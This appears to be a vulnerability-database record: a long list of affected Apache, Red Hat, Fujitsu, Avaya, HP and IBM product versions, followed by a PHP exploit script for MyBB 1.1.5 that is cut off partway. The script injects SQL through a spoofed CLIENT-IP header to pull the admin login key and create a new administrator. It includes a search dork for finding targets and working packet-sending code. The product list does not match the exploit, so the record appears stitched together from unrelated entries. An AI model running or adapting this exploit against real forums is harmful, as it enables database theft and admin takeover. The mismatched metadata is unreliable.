vendor:redhatmodel:enterprise linux desktop versionscope:eqversion:4

Trust: 0.3

vendor:redmodel:hat jboss enterprise web server for rhelscope:eqversion:61.0

Trust: 0.3

vendor:redmodel:hat jboss enterprise web server for rhel serverscope:eqversion:51.0

Trust: 0.3

vendor:redmodel:hat enterprise linux workstationscope:eqversion:6

Trust: 0.3

vendor:redmodel:hat enterprise linux serverscope:eqversion:6

Trust: 0.3

vendor:redmodel:hat enterprise linux hpc node optionalscope:eqversion:6

Trust: 0.3

vendor:redmodel:hat enterprise linux hpc nodescope:eqversion:6

Trust: 0.3

vendor:redmodel:hat enterprise linux desktop optionalscope:eqversion:6

Trust: 0.3

vendor:redmodel:hat enterprise linux desktopscope:eqversion:6

Trust: 0.3

vendor:redmodel:hat enterprise linux desktop clientscope:eqversion:5

Trust: 0.3

vendor:redmodel:hat enterprise linux asscope:eqversion:4

Trust: 0.3

vendor:redmodel:hat enterprise linux serverscope:eqversion:5

Trust: 0.3

vendor:oraclemodel:enterprise linuxscope:eqversion:4

Trust: 0.3

vendor:oraclemodel:application server 10g r3scope:eqversion:10.1.3.5.0

Trust: 0.3

vendor:mandrivamodel:linux mandrake x86 64scope:eqversion:2009.0

Trust: 0.3

vendor:mandrivamodel:linux mandrakescope:eqversion:2009.0

Trust: 0.3

vendor:ibmmodel:os/400 v6r1m0scope: - version: -

Trust: 0.3

vendor:ibmmodel:os/400 v5r5m0scope: - version: -

Trust: 0.3

vendor:ibmmodel:os/400 v5r4m0scope: - version: -

Trust: 0.3

vendor:ibmmodel:http serverscope:eqversion:7.0.11

Trust: 0.3

vendor:ibmmodel:http serverscope:eqversion:7.0.0.5

Trust: 0.3

vendor:ibmmodel:http serverscope:eqversion:7.0.0.19

Trust: 0.3

vendor:ibmmodel:http serverscope:eqversion:7.0.0.17

Trust: 0.3

vendor:ibmmodel:http serverscope:eqversion:7.0.0.15

Trust: 0.3

vendor:ibmmodel:http serverscope:eqversion:7.0.0.13

Trust: 0.3

vendor:hpmodel:system management homepagescope:eqversion:6.2.27

Trust: 0.3

vendor:hpmodel:system management homepagescope:eqversion:6.0.96

Trust: 0.3

vendor:hpmodel:system management homepagescope:eqversion:3.0.2.77

Trust: 0.3

vendor:hpmodel:system management homepagescope:eqversion:3.0.1.73

Trust: 0.3

vendor:hpmodel:system management homepagescope:eqversion:3.0.68

Trust: 0.3

vendor:hpmodel:system management homepagescope:eqversion:3.0.64

Trust: 0.3

vendor:hpmodel:system management homepagescope:eqversion:6.2.0-12

Trust: 0.3

vendor:hpmodel:system management homepagescope:eqversion:6.1.0.103

Trust: 0.3

vendor:hpmodel:system management homepagescope:eqversion:6.1.0.102

Trust: 0.3

vendor:hpmodel:system management homepagescope:eqversion:6.1.0-103

Trust: 0.3

vendor:hpmodel:system management homepagescope:eqversion:6.0.0.95

Trust: 0.3

vendor:hpmodel:system management homepagescope:eqversion:6.0.0-95

Trust: 0.3

vendor:hpmodel:system management homepage bscope:eqversion:3.0.2.77

Trust: 0.3

vendor:hpmodel:system management homepagescope:eqversion:3.0.2-77

Trust: 0.3

vendor:hpmodel:system management homepagescope:eqversion:3.0.1-73

Trust: 0.3

vendor:hpmodel:system management homepagescope:eqversion:3.0.0-68

Trust: 0.3

vendor:hpmodel:system management homepagescope:eqversion:0

Trust: 0.3

vendor:hpmodel:openvms secure web serverscope:eqversion:2.2

Trust: 0.3

vendor:fujitsumodel:interstage apworks modelers-j edition l10scope:eqversion:7.0

Trust: 0.3

vendor:fujitsumodel:interstage apworks modelers-j edition l10ascope:eqversion:6.0

Trust: 0.3

vendor:fujitsumodel:interstage apworks modelers-j edition l10scope:eqversion:6.0

Trust: 0.3

vendor:fujitsumodel:interstage application server web-j edition l20ascope:eqversion:5.0

Trust: 0.3

vendor:fujitsumodel:interstage application server web-j edition l20scope:eqversion:5.0

Trust: 0.3

vendor:fujitsumodel:interstage application server web-j edition l11scope:eqversion:5.0

Trust: 0.3

vendor:fujitsumodel:interstage application server web-j edition l10bscope:eqversion:5.0

Trust: 0.3

vendor:fujitsumodel:interstage application server web-j edition l10ascope:eqversion:5.0

Trust: 0.3

vendor:fujitsumodel:interstage application server web-j edition l10scope:eqversion:5.0

Trust: 0.3

vendor:fujitsumodel:interstage application server web-j editionscope:eqversion:5.0

Trust: 0.3

vendor:fujitsumodel:interstage application server standard-j editionscope:eqversion:9.2

Trust: 0.3

vendor:fujitsumodel:interstage application server standard-j editionscope:eqversion:9.1

Trust: 0.3

vendor:fujitsumodel:interstage application server standard-j edition bscope:eqversion:9.0.1

Trust: 0.3

vendor:fujitsumodel:interstage application server standard-j editionscope:eqversion:9.0.1

Trust: 0.3

vendor:fujitsumodel:interstage application server standard-j edition bscope:eqversion:9.0

Trust: 0.3

vendor:fujitsumodel:interstage application server standard-j edition ascope:eqversion:9.0

Trust: 0.3

vendor:fujitsumodel:interstage application server standard-j editionscope:eqversion:9.0

Trust: 0.3

vendor:fujitsumodel:interstage application server standard-j editionscope:eqversion:8.0.3

Trust: 0.3

vendor:fujitsumodel:interstage application server standard-j editionscope:eqversion:8.0.2

Trust: 0.3

vendor:fujitsumodel:interstage application server standard-j editionscope:eqversion:8.0.1

Trust: 0.3

vendor:fujitsumodel:interstage application server standard-j editionscope:eqversion:8.0

Trust: 0.3

vendor:fujitsumodel:interstage application server standard-j edition 9.1.0bscope: - version: -

Trust: 0.3

vendor:fujitsumodel:interstage application server standard edition l20ascope:eqversion:5.0

Trust: 0.3

vendor:fujitsumodel:interstage application server standard edition l20scope:eqversion:5.0

Trust: 0.3

vendor:fujitsumodel:interstage application server standard edition l11scope:eqversion:5.0

Trust: 0.3

vendor:fujitsumodel:interstage application server standard edition l10bscope:eqversion:5.0

Trust: 0.3

vendor:fujitsumodel:interstage application server standard edition l10ascope:eqversion:5.0

Trust: 0.3

vendor:fujitsumodel:interstage application server standard edition l10scope:eqversion:5.0

Trust: 0.3

vendor:fujitsumodel:interstage application server standard editionscope:eqversion:5.0

Trust: 0.3

vendor:fujitsumodel:interstage application server plus developerscope:eqversion:5.0.1

Trust: 0.3

vendor:fujitsumodel:interstage application server plus developer l10scope:eqversion:7.0

Trust: 0.3

vendor:fujitsumodel:interstage application server plus developerscope:eqversion:7.0

Trust: 0.3

vendor:fujitsumodel:interstage application server plus developer l10scope:eqversion:6.0

Trust: 0.3

vendor:fujitsumodel:interstage application server plus developerscope:eqversion:6.0

Trust: 0.3

vendor:fujitsumodel:interstage application server plus developer l20scope:eqversion:5.0

Trust: 0.3

vendor:fujitsumodel:interstage application server plusscope:eqversion:7.0.1

Trust: 0.3

vendor:fujitsumodel:interstage application server plusscope:eqversion:6.0.2

Trust: 0.3

vendor:fujitsumodel:interstage application server plusscope:eqversion:6.0.1

Trust: 0.3

vendor:fujitsumodel:interstage application server plusscope:eqversion:5.1.1

Trust: 0.3

vendor:fujitsumodel:interstage application server plusscope:eqversion:5.0.1

Trust: 0.3

vendor:fujitsumodel:interstage application server plus l11scope:eqversion:7.0

Trust: 0.3

vendor:fujitsumodel:interstage application server plus l10scope:eqversion:7.0

Trust: 0.3

vendor:fujitsumodel:interstage application server plusscope:eqversion:7.0

Trust: 0.3

vendor:fujitsumodel:interstage application server plus l11scope:eqversion:6.0

Trust: 0.3

vendor:fujitsumodel:interstage application server plus l10cscope:eqversion:6.0

Trust: 0.3

vendor:fujitsumodel:interstage application server plus l10bscope:eqversion:6.0

Trust: 0.3

vendor:fujitsumodel:interstage application server plus l10ascope:eqversion:6.0

Trust: 0.3

vendor:fujitsumodel:interstage application server plus l10scope:eqversion:6.0

Trust: 0.3

vendor:fujitsumodel:interstage application server plusscope:eqversion:6.0

Trust: 0.3

vendor:fujitsumodel:interstage application server plusscope:eqversion:5.1

Trust: 0.3

vendor:fujitsumodel:interstage application server enterprise editionscope:eqversion:9.1

Trust: 0.3

vendor:fujitsumodel:interstage application server enterprise edition bscope:eqversion:9.0.1

Trust: 0.3

vendor:fujitsumodel:interstage application server enterprise editionscope:eqversion:9.0.1

Trust: 0.3

vendor:fujitsumodel:interstage application server enterprise edition bscope:eqversion:9.0

Trust: 0.3

vendor:fujitsumodel:interstage application server enterprise editionscope:eqversion:8.0.3

Trust: 0.3

vendor:fujitsumodel:interstage application server enterprise editionscope:eqversion:8.0

Trust: 0.3

vendor:fujitsumodel:interstage application server enterprise editionscope:eqversion:6.0.2

Trust: 0.3

vendor:fujitsumodel:interstage application server enterprise editionscope:eqversion:6.0.1

Trust: 0.3

vendor:fujitsumodel:interstage application server enterprise editionscope:eqversion:5.1.1

Trust: 0.3

vendor:fujitsumodel:interstage application server enterprise editionscope:eqversion:5.0.1

Trust: 0.3

vendor:fujitsumodel:interstage application server enterprise edition 9.1.0bscope: - version: -

Trust: 0.3

vendor:fujitsumodel:interstage application server enterprise edition 9.1.0ascope: - version: -

Trust: 0.3

vendor:fujitsumodel:interstage application server enterprise edition l11scope:eqversion:7.0

Trust: 0.3

vendor:fujitsumodel:interstage application server enterprise edition l10scope:eqversion:7.0

Trust: 0.3

vendor:fujitsumodel:interstage application server enterprise edition 6.0ascope: - version: -

Trust: 0.3

vendor:fujitsumodel:interstage application server enterprise edition l10cscope:eqversion:6.0

Trust: 0.3

vendor:fujitsumodel:interstage application server enterprise edition l10bscope:eqversion:6.0

Trust: 0.3

vendor:fujitsumodel:interstage application server enterprise edition l10scope:eqversion:6.0

Trust: 0.3

vendor:fujitsumodel:interstage application server enterprise editionscope:eqversion:5.1

Trust: 0.3

vendor:fujitsumodel:interstage application server enterprise edition l20ascope:eqversion:5.0

Trust: 0.3

vendor:fujitsumodel:interstage application server enterprise edition l20scope:eqversion:5.0

Trust: 0.3

vendor:fujitsumodel:interstage application server enterprise edition l11scope:eqversion:5.0

Trust: 0.3

vendor:fujitsumodel:interstage application server enterprise edition l10bscope:eqversion:5.0

Trust: 0.3

vendor:fujitsumodel:interstage application server enterprise edition l10ascope:eqversion:5.0

Trust: 0.3

vendor:fujitsumodel:interstage application server enterprise edition l10scope:eqversion:5.0

Trust: 0.3

vendor:avayamodel:voice portal sp2scope:eqversion:4.1

Trust: 0.3

vendor:avayamodel:voice portal sp1scope:eqversion:4.1

Trust: 0.3

vendor:avayamodel:voice portalscope:eqversion:4.1

Trust: 0.3

vendor:avayamodel:voice portalscope:eqversion:4.0

Trust: 0.3

vendor:avayamodel:message networkingscope:eqversion:5.2.1

Trust: 0.3

vendor:avayamodel:message networkingscope:eqversion:5.2.2

Trust: 0.3

vendor:avayamodel:message networking sp1scope:eqversion:5.2

Trust: 0.3

vendor:avayamodel:message networkingscope:eqversion:5.2

Trust: 0.3

vendor:avayamodel:message networkingscope:eqversion:3.1

Trust: 0.3

vendor:avayamodel:meeting exchangescope:eqversion:5.0.0.52

Trust: 0.3

vendor:avayamodel:meeting exchange sp2scope:eqversion:5.2

Trust: 0.3

vendor:avayamodel:meeting exchange sp1scope:eqversion:5.2

Trust: 0.3

vendor:avayamodel:meeting exchangescope:eqversion:5.2

Trust: 0.3

vendor:avayamodel:meeting exchange sp1scope:eqversion:5.1

Trust: 0.3

vendor:avayamodel:meeting exchangescope:eqversion:5.1

Trust: 0.3

vendor:avayamodel:meeting exchange sp2scope:eqversion:5.0

Trust: 0.3

vendor:avayamodel:meeting exchange sp1scope:eqversion:5.0

Trust: 0.3

vendor:avayamodel:meeting exchangescope:eqversion:5.0

Trust: 0.3

vendor:avayamodel:aura system managerscope:eqversion:6.1.3

Trust: 0.3

vendor:avayamodel:aura system managerscope:eqversion:6.1.2

Trust: 0.3

vendor:avayamodel:aura system managerscope:eqversion:6.1.1

Trust: 0.3

vendor:avayamodel:aura system manager sp2scope:eqversion:6.1

Trust: 0.3

vendor:avayamodel:aura system manager sp1scope:eqversion:6.1

Trust: 0.3

vendor:avayamodel:aura system managerscope:eqversion:6.1

Trust: 0.3

vendor:avayamodel:aura system manager sp1scope:eqversion:6.0

Trust: 0.3

vendor:avayamodel:aura system managerscope:eqversion:6.0

Trust: 0.3

vendor:avayamodel:aura sip enablement servicesscope:eqversion:5.2.1

Trust: 0.3

vendor:avayamodel:aura sip enablement servicesscope:eqversion:5.2

Trust: 0.3

vendor:avayamodel:aura sip enablement servicesscope:eqversion:5.1

Trust: 0.3

vendor:avayamodel:aura sip enablement servicesscope:eqversion:5.0

Trust: 0.3

vendor:avayamodel:aura sip enablement servicesscope:eqversion:4.0

Trust: 0.3

vendor:avayamodel:aura communication managerscope:eqversion:5.2

Trust: 0.3

vendor:avayamodel:aura communication managerscope:eqversion:5.1

Trust: 0.3

vendor:avayamodel:aura application enablement servicesscope:eqversion:4.2.3

Trust: 0.3

vendor:avayamodel:aura application enablement servicesscope:eqversion:4.2.2

Trust: 0.3

vendor:avayamodel:aura application enablement servicesscope:eqversion:4.2.1

Trust: 0.3

vendor:avayamodel:aura application enablement servicesscope:eqversion:4.0.1

Trust: 0.3

vendor:avayamodel:aura application enablement servicesscope:eqversion:3.1.6

Trust: 0.3

vendor:avayamodel:aura application enablement servicesscope:eqversion:3.1.5

Trust: 0.3

vendor:avayamodel:aura application enablement servicesscope:eqversion:3.1.4

Trust: 0.3

vendor:avayamodel:aura application enablement servicesscope:eqversion:3.1.3

Trust: 0.3

vendor:avayamodel:aura application enablement servicesscope:eqversion:4.2

Trust: 0.3

vendor:avayamodel:aura application enablement servicesscope:eqversion:4.1

Trust: 0.3

vendor:avayamodel:aura application enablement servicesscope:eqversion:4.0

Trust: 0.3

vendor:avayamodel:aura application enablement servicesscope:eqversion:3.1

Trust: 0.3

vendor:avayamodel:aura application enablement servicesscope:eqversion:3.0

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.3.6

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.3.5

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.3.4

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.3.2

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.3.1

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.3

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.2.15

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.2.14

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.2.13

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.2.12

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.2.11

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.2.10

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.2.9

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.2.8

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.2.6

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.2.5

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.2.4

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.2.3

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.2.2

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.1.9

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.1.8

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.1.7

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.1.6

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.1.5

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.1.4

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.1.3

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.1.2

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.1.1

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.1

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.63

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.61

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.60

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.59

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.58

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.57

Trust: 0.3

vendor:apachemodel:software foundation apache -devscope:eqversion:2.0.56

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.56

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.55

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.54

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.53

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.52

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.51

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.50

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.49

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.48

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.47

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.46

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.45

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.44

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.43

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.42

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.41

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.40

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.39

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.38

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.37

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.36

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.35

Trust: 0.3

vendor:apachemodel:software foundation apache -betascope:eqversion:2.0.34

Trust: 0.3

vendor:apachemodel:software foundation apache -betascope:eqversion:2.0.32

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.32

Trust: 0.3

vendor:apachemodel:software foundation apache -betascope:eqversion:2.0.28

Trust: 0.3

vendor:apachemodel:software foundation apache betascope:eqversion:2.0.28

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.28

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0.9

Trust: 0.3

vendor:apachemodel:software foundation apache a9scope:eqversion:2.0

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.0

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.68

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.65

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.42

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.41

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.39

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.38

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.37

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.36

Trust: 0.3

vendor:apachemodel:software foundation apache -devscope:eqversion:1.3.35

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.34

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.33

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.32

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.31

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.30

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.29

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.28

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.27

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.26

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.25

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.24

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.23

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.22

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.20

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.19

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.18

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.17

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.16

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.15

Trust: 0.3

vendor:apachemodel:software foundation apache macscope:eqversion:1.3.14

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.14

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.13

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.12

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.11

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.10

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.9

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.8

Trust: 0.3

vendor:apachemodel:software foundation apache -devscope:eqversion:1.3.7

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.7

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.6

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.5

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.4

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.3

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.2

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.1

Trust: 0.3

vendor:apachemodel:software foundation apache 2.3.38-devscope: - version: -

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.3.3

Trust: 0.3

vendor:apachemodel:software foundation apache 2.2.7-devscope: - version: -

Trust: 0.3

vendor:apachemodel:software foundation apache 2.2.6-devscope: - version: -

Trust: 0.3

vendor:apachemodel:software foundation apache 2.2.5-devscope: - version: -

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.2.21

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.2.20

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.2.19

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.2.18

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.2.17

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.2.16

Trust: 0.3

vendor:apachemodel:software foundation apache 2.2.15-devscope: - version: -

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:2.2.1

Trust: 0.3

vendor:apachemodel:software foundation apache 2.0.64-devscope: - version: -

Trust: 0.3

vendor:apachemodel:software foundation apache 2.0.62-devscope: - version: -

Trust: 0.3

vendor:apachemodel:software foundation apache 2.0.61-devscope: - version: -

Trust: 0.3

vendor:apachemodel:software foundation apache 2.0.60-devscope: - version: -

Trust: 0.3

vendor:apachemodel:software foundation apache 1.3.40-devscope: - version: -

Trust: 0.3

vendor:apachemodel:software foundation apachescope:eqversion:1.3.35

Trust: 0.3

vendor:ibmmodel:http serverscope:neversion:7.0.0.21

Trust: 0.3

vendor:hpmodel:system management homepagescope:neversion:7.0

Trust: 0.3

vendor:apachemodel:software foundation apachescope:neversion:2.2.22

Trust: 0.3

sources: BID: 51706 // BID: 49957 // PACKETSTORM: 109284 // EXPLOIT-DB: 2012

EXPLOIT

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "MyBulletinBoard (MyBB) <= 1.1.5 'CLIENT-IP' SQL injection / create new admin exploit\n";
echo "by rgod rgod@autistici.org\n";
echo "site: http://retrogod.altervista.org\n";
echo "dork, version specific: \"Powered By MyBB\" \"2006 MyBB Group\"\n\n";
/*
works regardless of php.ini settings
*/
if ($argc<3) {
echo "Usage: php ".$argv[0]." host path OPTIONS\n";
echo "host: target server (ip/hostname)\n";
echo "path: path to MyBB\n";
echo "Options:\n";
echo " -T[prefix] specify a table prefix different from default (mybb_)\n";
echo " -u[number] specify a user id other than 1 (usually admin)\n";
echo " -p[port]: specify a port other than 80\n";
echo " -P[ip:port]: specify a proxy\n";
echo " -d: disclose table prefix (reccomended)\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /MyBB/ -d\r\n";
echo "php ".$argv[0]." localhost /MyBB/ -Tmy_\r\n";
die;
}
/* software site: http://www.mybboard.com/

vulnerable code in inc/functions.php near lines 1292-1320:

...
function getip() {
global $_SERVER;
if($_SERVER['HTTP_X_FORWARDED_FOR'])
{
if(preg_match_all("#[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#s", $_SERVER['HTTP_X_FORWARDED_FOR'], $addresses))
{
while(list($key, $val) = each($addresses[0]))
{
if(!preg_match("#^(10|172\.16|192\.168)\.#", $val))
{
$ip = $val;
break;
}
}
}
}
if(!$ip)
{
if($_SERVER['HTTP_CLIENT_IP'])
{
$ip = $_SERVER['HTTP_CLIENT_IP'];
}
else
{
$ip = $_SERVER['REMOTE_ADDR'];
}
}
return $ip;
}
...

you can spoof your ip address through the CLIENT-IP http header...
as result you can inject sql statements in class_session.php at lines 36-68:
by calling the main index.php script
...
function init()
{
global $ipaddress, $db, $mybb, $noonline;
//
// Get our visitors IP
//
$this->ipaddress = $ipaddress = getip();

//
// User-agent
//
$this->useragent = $_SERVER['HTTP_USER_AGENT'];
if(strlen($this->useragent) > 100)
{
$this->useragent = substr($this->useragent, 0, 100);
}

//
// Attempt to find a session id in the cookies
//
if($_COOKIE['sid'])
{
$this->sid = addslashes($_COOKIE['sid']);
}
else
{
$this->sid = 0;
}

//
// Attempt to load the session from the database
//
$query = $db->query("SELECT sid,uid FROM ".TABLE_PREFIX."sessions WHERE sid='".$this->sid."' AND ip='".$this->ipaddress."'");
...

injection is blind, but you can ask true-false questions to the database to
retrieve the admin loginkey.
Through that you can build an admin cookie and create a new admin user through
the admin/users.php script.
Also you can disclose table prefix.

--------------------------------------------------------------------------------

-*****************************************************************************-
* *
* Italia - Germania 2-0, al 114' forse il piĆ¹ bel gol che abbia mai visto *
* grazie Grosso! *
* *
-*****************************************************************************-
*/

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}

function make_seed()
{
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
}
srand(make_seed());
$anumber = rand(1,99999);

$host=$argv[1];
$path=$argv[2];
$port=80;
$prefix="mybb_";
$user_id="1";//admin
$proxy="";
$dt=0;
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
$prefix=str_replace("-T","",$argv[$i]);
}
if ($temp=="-u")
{
$user_id=str_replace("-u","",$argv[$i]);
}
if ($temp=="-d")
{
$dt=1;
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

if ($dt)
{
$sql="'suntzuuuu/*";
echo "sql -> ".$sql."\r\n";
$packet ="GET ".$p."index.php HTTP/1.0\r\n";
$packet.="CLIENT-IP: $sql\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("You have an error in your SQL syntax",$html))
{
$temp=explode("sessions",$html);
$temp2=explode(" ",$temp[0]);
$prefix=$temp2[count($temp2)-1];
echo "prefix -> ".$prefix;if ($prefix==""){echo "[no prefix]";}echo"\n";
}
else
{
